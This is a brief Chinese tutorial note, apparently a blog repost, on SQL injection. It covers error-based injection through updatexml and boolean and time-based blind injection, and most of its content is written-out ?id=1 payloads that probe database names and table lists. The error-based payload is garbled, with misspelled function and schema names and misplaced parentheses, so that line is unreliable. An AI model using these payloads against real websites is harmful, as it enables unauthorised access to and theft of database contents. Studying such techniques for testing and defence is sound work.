数据库
首页 > 数据库> > 4.SQL注入-错误注入与盲注

4.SQL注入-错误注入与盲注

作者:互联网

一.Union查询注入不使用的地方

1.注入语句无法截断,且不清楚完整的SQL查询语句;

2.页面不能返回查询信息的时候;

3.Web页面中有两个SQL查询语句,查询语句的列数不同;

 

二.关于MySQL处理XML

1.先准备以下XML内容

?id=1 and updataxml(1,concat(0x7e,(select group_concat(table_name) 
from information_schma.tables,0x7e),1)

 

三.盲注

没有回显的时候

1.Boolean型注入

?id=1 and  length(database())=5

?id=1 and (select substr(database(),1,1)='l')

2.时间型注入

?id=1 and if(length(database())=5,sleep(2),1);

?id=1 and if((select substr(database(),1,1)='l'),sleep(2),1);

 

标签:语句,database,查询,SQL,盲注,id,select,注入
来源: https://www.cnblogs.com/eveplw/p/16538155.html